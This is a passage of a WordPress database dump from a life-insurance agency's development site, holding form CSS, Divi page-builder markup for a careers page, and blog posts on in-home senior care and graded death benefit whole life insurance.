textfield;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    font-weight: 600;\r\n    color: #000;\r\n    font-size: 14px;\r\n    margin: 0;\r\n    max-width: 40%;\r\n    line-height: 18px;\r\n    margin-bottom: 5px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio .gchoice input[type=radio] {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio {\r\n    display: grid;\r\n    grid-template-columns: 1fr 1fr;\r\n    gap: 16px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio label {\r\n    width: 100%;\r\n    max-width: 100%;\r\n    border: 1px solid #666;\r\n    text-align: center;\r\n    color: #333;\r\n    padding: 10px;\r\n    border-radius: 5px;\r\n    cursor: pointer;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio input:checked + label {\r\n    background: #e3e1e1;\r\n    color: #000;\r\n    border-color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    padding: 0;\r\n    margin: 40px 0 0 0;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit] {\r\n    margin: 0;\r\n    padding: 12px 50px;\r\n    border: 1px solid #000;\r\n    background: #000;\r\n    border-radius: 5px;\r\n    color: #fff;\r\n    font-size: 16px;\r\n    text-transform: uppercase;\r\n    font-weight: 600;\r\n    transition: 0.3s;\r\n    cursor: pointer;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit]:hover {\r\n    background: #333;\r\n}\r\n\r\n\r\n.gform_wrapper.tc_wrapper .gform_validation_errors {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield_error .validation_message {\r\n    border: none;\r\n    background: transparent;\r\n    color: #C02B0A !important;\r\n    margin-top: 5px;\r\n    padding: 0;\r\n    font-size: 14px;\r\n}\r\np.qut {\r\n    font-size: 24px;\r\n    color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn .gfield_label {\r\n    width: auto;\r\n    font-size: 18px;\r\n    max-width: max-content;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn input {\r\n    border: none;\r\n    padding: 0;\r\n    font-size: 18px !important;\r\n    font-weight: 700;\r\n    color: #000;\r\n    width: max-content;\r\n    max-width: max-content;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn .ginput_container {\r\n    max-width: max-content;\r\n    display: inline-block;\r\n    margin-left: 10px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    display: none !important;\r\n}\r\n\r\n\r\n@media only screen and (max-width: 767px) { \r\n	\r\n.gform_wrapper.tc_wrapper {\r\n    width: 100%;\r\n    padding: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    font-size: 18px;\r\n    margin-bottom: 20px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    grid-template-columns: 1fr;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    margin-top: 15px;\r\n}\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    padding: 6px 15px;\r\n}\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    max-width: 100%;\r\n}','Divi','','publish','closed','closed','','divi','','','2023-04-04 00:28:50','2023-04-04 00:28:50','',0,'http://cmdev-site1.com/2023/02/28/divi/',0,'custom_css','',0),(36,1,'2023-02-28 14:07:12','2023-02-28 14:07:12','','Divi','','inherit','closed','closed','','35-revision-v1','','','2023-02-28 14:07:12','2023-02-28 14:07:12','',35,'http://cmdev-site1.com/?p=36',0,'revision','',0),(199,1,'2023-03-08 12:44:51','2023-03-08 12:44:51','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.0\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_blog posts_number=\"3\" include_categories=\"all\" _builder_version=\"4.20.0\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section]','Home - 2','','inherit','closed','closed','','138-revision-v1','','','2023-03-08 12:44:51','2023-03-08 12:44:51','',138,'http://cmdev-site1.com/?p=199',0,'revision','',0),(38,1,'2023-02-28 14:53:11','2023-02-28 14:53:11','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"||17px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_color=\"#FFFFFF\" header_2_font_size=\"50px\" global_colors_info=\"{}\"]<h2>Careers</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" custom_margin=\"||-2px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto|||false|false\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" _builder_version=\"4.20.4\" _module_preset=\"default\" width=\"70%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" width_tablet=\"\" width_phone=\"\" width_last_edited=\"on|phone\" module_alignment=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" module_alignment=\"center\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|desktop\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life are truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Justin-Conference-2-Cropped.png\" parallax=\"on\" height=\"350px\" custom_padding=\"100px||0px||false|false\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"2px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','publish','closed','closed','','careers','','','2023-04-11 21:39:18','2023-04-11 21:39:18','',0,'http://cmdev-site1.com/?page_id=38',0,'page','',0),(39,1,'2023-02-28 14:13:42','2023-02-28 14:13:42','','Auto Draft','','inherit','closed','closed','','38-revision-v1','','','2023-02-28 14:13:42','2023-02-28 14:13:42','',38,'http://cmdev-site1.com/?p=39',0,'revision','',0),(40,1,'2023-02-28 14:19:39','2023-02-28 14:19:39','','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-02-28 14:19:39','2023-02-28 14:19:39','',38,'http://cmdev-site1.com/?p=40',0,'revision','',0),(42,1,'2023-02-28 14:36:54','2023-02-28 14:36:54','','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-02-28 14:36:54','2023-02-28 14:36:54','',38,'http://cmdev-site1.com/?p=42',0,'revision','',0),(41,1,'2023-02-28 14:20:24','2023-02-28 14:20:24','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-02-28 14:20:24','2023-02-28 14:20:24','',38,'http://cmdev-site1.com/?p=41',0,'revision','',0),(44,1,'2023-02-28 14:52:53','2023-02-28 14:52:53','<!-- wp:heading {\"textAlign\":\"center\"} -->\n<h2 class=\"has-text-align-center\"><strong><sup>Careers</sup></strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\">Learn about our available careers and how you can join our company today!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":43,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/Careers-Photo-No-Background-1024x443.png\" alt=\"\" class=\"wp-image-43\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"textAlign\":\"center\"} -->\n<h2 class=\"has-text-align-center\">Grow Your Vision</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\">Interested in starting your career path and joining our team?&nbsp;<a>Let\'s Talk!&nbsp;</a></p>\n<!-- /wp:paragraph -->','','','inherit','closed','closed','','38-revision-v1','','','2023-02-28 14:52:53','2023-02-28 14:52:53','',38,'http://cmdev-site1.com/?p=44',0,'revision','',0),(54,1,'2023-03-01 13:34:18','2023-03-01 13:34:18','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Lucille Reed</span></div>\r\nMany seniors are able to lead independent lives. But the aging process often requires getting in-home care or moving to assisted living so you or a loved one can continue leading a happy and fulfilling life.\r\n\r\nWhile the decision to opt for in-home care for yourself or a loved one is a very personal one, this article aims to help you decide when the time is right. There are considerations that both the senior and the caregiver should take into consideration.\r\n<h3>Senior Signs</h3>\r\nHere are five signs seniors may exhibit that could help you recognize it’s time for a senior to consider in-home care or moving to an assisted living facility:<sup>1</sup>\r\n<ol>\r\n 	<li>Behavior changes</li>\r\n 	<li>Assistance with hygiene needed</li>\r\n 	<li>Worsening health conditions</li>\r\n 	<li>Increasing number of falls or accidents</li>\r\n 	<li>Signs of neglect around the home</li>\r\n</ol>\r\nThese can often be in conjunction with one another.\r\n<h3>Caregiver Signs</h3>\r\nIt is also important that the concerns of those providing care for family members be taken into consideration. As a caregiver, you cannot give your best if you are struggling to balance caring for your senior with other responsibilities like your work and family.<sup>2</sup>\r\n\r\nCaregivers may exhibit three signs that could help you recognize it’s time for a senior to consider in-home care or moving to an assisted living facility:<sup>3</sup>\r\n<ol>\r\n 	<li>Emotional burnout</li>\r\n 	<li>Physical burnout</li>\r\n 	<li>Role confusion</li>\r\n</ol>\r\nThe transition to getting in-home care or moving to assisted living is a sensitive and personal decision.\r\n\r\nRecognizing some signs of decline in seniors and caregivers may help ease the transition. Communication and coordination between caregivers and seniors are key throughout the aging process.<sup>2</sup>\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<span style=\"font-size: 8pt;\">Sources:\r\n</span><em style=\"font-size: 8pt;\">1. WAHCA, 5 Signs That It Might Be Time to Consider Home Care, 2019, <a href=\"https://wahca.org/home-care/in-home-care/5-signs-that-it-might-be-time-to-consider-home-care/\" target=\"_blank\" rel=\"noopener noreferrer\">https://wahca.org/home-care/in-home-care/5-signs-that-it-might-be-time-to-consider-home-care/</a>\r\n</em><em style=\"font-size: 8pt;\">2. Johns Hopkins Medicine, Caregiving: Knowing When It’s Time for In-Home Help, 2021, <a href=\"https://www.hopkinsmedicine.org/health/wellness-and-prevention/caregiving-knowing-when-its-time-for-in-home-help\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.hopkinsmedicine.org/health/wellness-and-prevention/caregiving-knowing-when-its-time-for-in-home-help</a>\r\n</em><em style=\"font-size: 8pt;\">3. Assistedliving.org, 5 Signs It’s Time to Hire a Home Health Aide, n.d. 2021, <a href=\"https://www.assistedliving.org/hire-a-home-health-aide/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.assistedliving.org/hire-a-home-health-aide/</a></em>','Key Signs It’s Time To Get In-Home Care Or Move To An Assisted Living Facility','','publish','open','open','','key-signs-its-time-to-get-in-home-care-or-move-to-an-assisted-living-facility','','','2023-03-19 17:37:18','2023-03-19 17:37:18','',0,'http://cmdev-site1.com/?p=54',0,'post','',0),(165,1,'2023-03-06 13:48:02','2023-03-06 13:48:02','<!-- wp:heading {\"textAlign\":\"center\"} -->\r\n<h1 class=\"has-text-align-center\" style=\"text-align: center;\">Grow Your Future With Us</h1>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph {\"align\":\"center\"} -->\r\n<h2 style=\"text-align: center;\">Interested in starting your career path and joining our team? <a>Let\'s Talk! </a></h2>\r\n<p>&nbsp;</p>\r\n<p class=\"has-text-align-center\" style=\"text-align: center;\">Learn about our available openings and how you can join our team today!</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>&nbsp;</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:image {\"id\":43,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\r\n<figure class=\"wp-block-image size-large\"><img class=\"wp-image-43\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/Careers-Photo-No-Background-1024x443.png\" alt=\"\" /></figure>\r\n<!-- /wp:image -->\r\n\r\n<!-- wp:paragraph --><!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading {\"textAlign\":\"center\"} -->\r\n<h2 class=\"has-text-align-center\" style=\"text-align: center;\"> </h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph {\"align\":\"center\"} --><!-- /wp:paragraph -->','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-03-06 13:48:02','2023-03-06 13:48:02','',38,'http://cmdev-site1.com/?p=165',0,'revision','',0),(52,1,'2023-02-28 16:38:44','2023-02-28 16:38:44','<!-- wp:heading {\"textAlign\":\"center\"} -->\r\n<h1 class=\"has-text-align-center\" style=\"text-align: center;\"><sup>Careers</sup></h1>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph {\"align\":\"center\"} -->\r\n<p class=\"has-text-align-center\" style=\"text-align: center;\">Learn about our available careers and how you can join our company today!</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>&nbsp;</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:image {\"id\":43,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\r\n<figure class=\"wp-block-image size-large\"><img class=\"wp-image-43\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/Careers-Photo-No-Background-1024x443.png\" alt=\"\" /></figure>\r\n<!-- /wp:image -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>&nbsp;</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading {\"textAlign\":\"center\"} -->\r\n<h2 class=\"has-text-align-center\" style=\"text-align: center;\">Grow Your Vision</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph {\"align\":\"center\"} -->\r\n<p class=\"has-text-align-center\" style=\"text-align: center;\">Interested in starting your career path and joining our team? <a>Let\'s Talk! </a></p>\r\n<!-- /wp:paragraph -->','Career','','inherit','closed','closed','','38-revision-v1','','','2023-02-28 16:38:44','2023-02-28 16:38:44','',38,'http://cmdev-site1.com/?p=52',0,'revision','',0),(55,1,'2023-03-01 13:32:39','2023-03-01 13:32:39','Closeup of a support hands','Closeup of a support hands','','inherit','open','closed','','closeup-of-a-support-hands','','','2023-03-01 13:33:34','2023-03-01 13:33:34','',54,'http://cmdev-site1.com/wp-content/uploads/2023/03/Senior-and-nurse-1000X667.jpg',0,'attachment','image/jpeg',0),(56,1,'2023-03-01 13:33:48','2023-03-01 13:33:48','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Lucille Reed • June 02, 2021</span></div>\r\n&nbsp;\r\n\r\nMany seniors are able to lead independent lives. But the aging process often requires getting in-home care or moving to assisted living so you or a loved one can continue leading a happy and fulfilling life.\r\n\r\nWhile the decision to opt for in-home care for yourself or a loved one is a very personal one, this article aims to help you decide when the time is right. There are considerations that both the senior and the caregiver should take into consideration.\r\n<h3>Senior Signs</h3>\r\nHere are five signs seniors may exhibit that could help you recognize it’s time for a senior to consider in-home care or moving to an assisted living facility:<sup>1</sup>\r\n<ol>\r\n 	<li>Behavior changes</li>\r\n 	<li>Assistance with hygiene needed</li>\r\n 	<li>Worsening health conditions</li>\r\n 	<li>Increasing number of falls or accidents</li>\r\n 	<li>Signs of neglect around the home</li>\r\n</ol>\r\nThese can often be in conjunction with one another.\r\n<h3>Caregiver Signs</h3>\r\nIt is also important that the concerns of those providing care for family members be taken into consideration. As a caregiver, you cannot give your best if you are struggling to balance caring for your senior with other responsibilities like your work and family.<sup>2</sup>\r\n\r\nCaregivers may exhibit three signs that could help you recognize it’s time for a senior to consider in-home care or moving to an assisted living facility:<sup>3</sup>\r\n<ol>\r\n 	<li>Emotional burnout</li>\r\n 	<li>Physical burnout</li>\r\n 	<li>Role confusion</li>\r\n</ol>\r\nThe transition to getting in-home care or moving to assisted living is a sensitive and personal decision.\r\n\r\nRecognizing some signs of decline in seniors and caregivers may help ease the transition. Communication and coordination between caregivers and seniors is key throughout the aging process.<sup>2</sup>\r\n<h5>Sources:</h5>\r\n<div><span style=\"font-size: 8pt;\"><em>1. WAHCA, 5 Signs That It Might Be Time to Consider Home Care, 2019, <a href=\"https://wahca.org/home-care/in-home-care/5-signs-that-it-might-be-time-to-consider-home-care/\" target=\"_blank\" rel=\"noopener noreferrer\">https://wahca.org/home-care/in-home-care/5-signs-that-it-might-be-time-to-consider-home-care/</a></em></span>\r\n\r\n<span style=\"font-size: 8pt;\"><em>2. Johns Hopkins Medicine, Caregiving: Knowing When It’s Time for In-Home Help, 2021, <a href=\"https://www.hopkinsmedicine.org/health/wellness-and-prevention/caregiving-knowing-when-its-time-for-in-home-help\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.hopkinsmedicine.org/health/wellness-and-prevention/caregiving-knowing-when-its-time-for-in-home-help</a></em></span>\r\n\r\n<span style=\"font-size: 8pt;\"><em>3. Assistedliving.org, 5 Signs It’s Time to Hire a Home Health Aide, n.d. 2021, <a href=\"https://www.assistedliving.org/hire-a-home-health-aide/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.assistedliving.org/hire-a-home-health-aide/</a></em></span></div>','Key Signs it’s Time to Get In-Home Care or Move to an Assisted Living Facility','','inherit','closed','closed','','54-revision-v1','','','2023-03-01 13:33:48','2023-03-01 13:33:48','',54,'http://cmdev-site1.com/?p=56',0,'revision','',0),(84,1,'2023-03-01 14:43:34','2023-03-01 14:43:34','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Lucille Reed</span></div>\r\nMany seniors are able to lead independent lives. But the aging process often requires getting in-home care or moving to assisted living so you or a loved one can continue leading a happy and fulfilling life.\r\n\r\nWhile the decision to opt for in-home care for yourself or a loved one is a very personal one, this article aims to help you decide when the time is right. There are considerations that both the senior and the caregiver should take into consideration.\r\n<h3>Senior Signs</h3>\r\nHere are five signs seniors may exhibit that could help you recognize it’s time for a senior to consider in-home care or moving to an assisted living facility:<sup>1</sup>\r\n<ol>\r\n 	<li>Behavior changes</li>\r\n 	<li>Assistance with hygiene needed</li>\r\n 	<li>Worsening health conditions</li>\r\n 	<li>Increasing number of falls or accidents</li>\r\n 	<li>Signs of neglect around the home</li>\r\n</ol>\r\nThese can often be in conjunction with one another.\r\n<h3>Caregiver Signs</h3>\r\nIt is also important that the concerns of those providing care for family members be taken into consideration. As a caregiver, you cannot give your best if you are struggling to balance caring for your senior with other responsibilities like your work and family.<sup>2</sup>\r\n\r\nCaregivers may exhibit three signs that could help you recognize it’s time for a senior to consider in-home care or moving to an assisted living facility:<sup>3</sup>\r\n<ol>\r\n 	<li>Emotional burnout</li>\r\n 	<li>Physical burnout</li>\r\n 	<li>Role confusion</li>\r\n</ol>\r\nThe transition to getting in-home care or moving to assisted living is a sensitive and personal decision.\r\n\r\nRecognizing some signs of decline in seniors and caregivers may help ease the transition. Communication and coordination between caregivers and seniors are key throughout the aging process.<sup>2</sup>\r\n\r\n<span style=\"font-size: 8pt;\">Sources:\r\n</span><em style=\"font-size: 8pt;\">1. WAHCA, 5 Signs That It Might Be Time to Consider Home Care, 2019, <a href=\"https://wahca.org/home-care/in-home-care/5-signs-that-it-might-be-time-to-consider-home-care/\" target=\"_blank\" rel=\"noopener noreferrer\">https://wahca.org/home-care/in-home-care/5-signs-that-it-might-be-time-to-consider-home-care/</a>\r\n</em><em style=\"font-size: 8pt;\">2. Johns Hopkins Medicine, Caregiving: Knowing When It’s Time for In-Home Help, 2021, <a href=\"https://www.hopkinsmedicine.org/health/wellness-and-prevention/caregiving-knowing-when-its-time-for-in-home-help\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.hopkinsmedicine.org/health/wellness-and-prevention/caregiving-knowing-when-its-time-for-in-home-help</a>\r\n</em><em style=\"font-size: 8pt;\">3. Assistedliving.org, 5 Signs It’s Time to Hire a Home Health Aide, n.d. 2021, <a href=\"https://www.assistedliving.org/hire-a-home-health-aide/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.assistedliving.org/hire-a-home-health-aide/</a></em>','Key Signs It’s Time To Get In-Home Care Or Move To An Assisted Living Facility','','inherit','closed','closed','','54-revision-v1','','','2023-03-01 14:43:34','2023-03-01 14:43:34','',54,'http://cmdev-site1.com/?p=84',0,'revision','',0),(57,1,'2023-03-01 13:45:55','2023-03-01 13:45:55','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Lucille Reed</span></div>\r\n<div></div>\r\n<div class=\"article_info\">This situation may be familiar to you: You’ve made the decision to help protect your family and are considering purchasing life insurance as a means to do so. However, as you start looking into life insurance options, you begin to feel overwhelmed by the amount of choices available to you and may even be confused if you qualify for life insurance.</div>\r\n<div></div>\r\n<div class=\"article_info\">In this article, we’ll discuss one specific type of whole life insurance: graded death benefit whole life insurance. Read on to learn more about what a graded death benefit whole life insurance policy is, how it works, and considerations to make before purchasing it.</div>\r\n&nbsp;\r\n\r\nGraded death benefit whole life policies are a type of whole life insurance. Life insurance policies are offered in two major types: term life and whole life policies.\r\n\r\n<a href=\"https://www.globelifeinsurance.com/article/how-long-term-life-policy\" target=\"_blank\" rel=\"noopener noreferrer\">Term life insurance</a> is a type of life insurance policy that pays a stated death benefit in the event the person insured dies during the specified term of coverage.\r\n\r\n<a href=\"https://www.globelifeinsurance.com/article/what-is-whole-life-insurance\" target=\"_blank\" rel=\"noopener noreferrer\">Traditional whole life insurance</a>, meanwhile, provides permanent death benefit coverage for the life of the insured. Whole life insurance may also carry a cash value component, which allows the policyholder to build <a href=\"https://home.globelifeinsurance.com/articles/august-2020/can-whole-life-insurance-be-used-to-save-for-c-(1)\" target=\"_blank\" rel=\"noopener noreferrer\">cash value</a> after a certain amount of time via the payment of premiums.\r\n\r\nWhat are the requirements for purchasing life insurance? Is a medical exam or health application required?\r\n\r\nLife insurance providers may require you to provide evidence of insurability prior to issuing you coverage. Evidence of insurability may involve you undergoing a medical exam or answering a health questionnaire.\r\n\r\nThis is not a comprehensive list of requirements that may be involved in purchasing life insurance.\r\n<h3>What is a graded death benefit whole life insurance policy?</h3>\r\nA graded death benefit whole life insurance policy is a type of whole life insurance. It may provide people not approved for standard life insurance an option to purchase life insurance.\r\n\r\nWhy? A medical exam is usually not required for a graded death benefit whole life insurance policy. As such, it may be an attractive option for people who have been declined for coverage due to personal health or other reasons like heart conditions, cancer, or even stroke.\r\n<h3>How does a graded death benefit whole life insurance policy work?</h3>\r\nA graded death benefit whole life insurance policy often works like a normal whole life insurance policy, except it usually has a waiting period, typically two to three years, before it will pay the full amount of death benefits. In the event your death occurs during the waiting period, a graded death benefit whole life insurance policy may pay a lower amount to your beneficiaries.\r\n\r\nWhat might you consider before purchasing a graded death benefit whole life insurance policy?\r\n\r\nYou may want to consider the following before purchasing a graded death benefit whole life insurance policy:\r\n<ol>\r\n 	<li><strong>Consider your health.</strong>\r\nA graded death benefit whole life insurance policy may offer those with significant risk factors a way to get life insurance. It may also be an appropriate option for you if you consider undergoing a health exam or a more exhaustive health screening a hassle.</li>\r\n 	<li><strong>Consider whether or not you want a type of whole life insurance policy.</strong>\r\nA graded death benefit policy is a type of whole life insurance. It provides coverage for the life of the insured, unlike term life insurance policies that expire after a certain time period.</li>\r\n 	<li><strong>Consider the waiting period and associated premiums.</strong>\r\nPremiums usually do not increase year-to-year for a graded death benefit whole life insurance policy. After the waiting period, the policy’s benefits will increase to the face value—the full insurance coverage amount—of the policy.</li>\r\n</ol>\r\nThis is not a comprehensive list of factors you may want to consider before purchasing a graded death benefit whole life insurance policy.\r\n<h3>A graded death benefit whole life insurance policy may be a helpful insurance coverage option for you.</h3>\r\nA graded death whole life insurance policy may be a helpful insurance coverage option for you. It may be able to help provide you with financial protection if you would not otherwise qualify for life insurance due to a pre-existing or chronic health condition or illness.\r\n\r\nA graded death benefit whole life insurance policy may require a waiting period to pass before paying out on the policy.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.','How Does A Graded Death Benefit Whole Life Insurance Policy Work?','','publish','open','open','','how-does-a-graded-death-benefit-whole-life-insurance-policy-work','','','2023-03-19 17:37:55','2023-03-19 17:37:55','',0,'http://cmdev-site1.com/?p=57',0,'post','',0),(58,1,'2023-03-01 13:42:43','2023-03-01 13:42:43','','Family of six','Portrait of senior and young couples with their children looking at camera at home','inherit','open','closed','','family-of-six','','','2023-03-01 13:42:43','2023-03-01 13:42:43','',57,'http://cmdev-site1.com/wp-content/uploads/2023/03/Seniors-with-their-family-1000x667-1.jpg',0,'attachment','image/jpeg',0),(60,1,'2023-03-01 13:45:55','2023-03-01 13:45:55','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Lucille Reed • August 31, 2021</span></div>\r\n<div></div>\r\n<div class=\"article_info\">This situation may be familiar to you: You’ve made the decision to help protect your family and are considering purchasing life insurance as a means to do so. However, as you start looking into life insurance options, you begin to feel overwhelmed by the amount of choices available to you and may even be confused if you qualify for life insurance.</div>\r\n<div></div>\r\n<div class=\"article_info\">In this article, we’ll discuss one specific type of whole life insurance: graded death benefit whole life insurance. Read on to learn more about what a graded death benefit whole life insurance policy is, how it works, and considerations to make before purchasing it.</div>\r\n&nbsp;\r\n\r\nGraded death benefit whole life policies are a type of whole life insurance. Life insurance policies are offered in two major types: term life and whole life policies.\r\n\r\n<a href=\"https://www.globelifeinsurance.com/article/how-long-term-life-policy\" target=\"_blank\" rel=\"noopener noreferrer\">Term life insurance</a> is a type of life insurance policy that pays a stated death benefit in the event the person insured dies during the specified term of coverage.\r\n\r\n<a href=\"https://www.globelifeinsurance.com/article/what-is-whole-life-insurance\" target=\"_blank\" rel=\"noopener noreferrer\">Traditional whole life insurance</a>, meanwhile, provides permanent death benefit coverage for the life of the insured. Whole life insurance may also carry a cash value component, which allows the policyholder to build <a href=\"https://home.globelifeinsurance.com/articles/august-2020/can-whole-life-insurance-be-used-to-save-for-c-(1)\" target=\"_blank\" rel=\"noopener noreferrer\">cash value</a> after a certain amount of time via the payment of premiums.\r\n\r\nWhat are the requirements for purchasing life insurance? Is 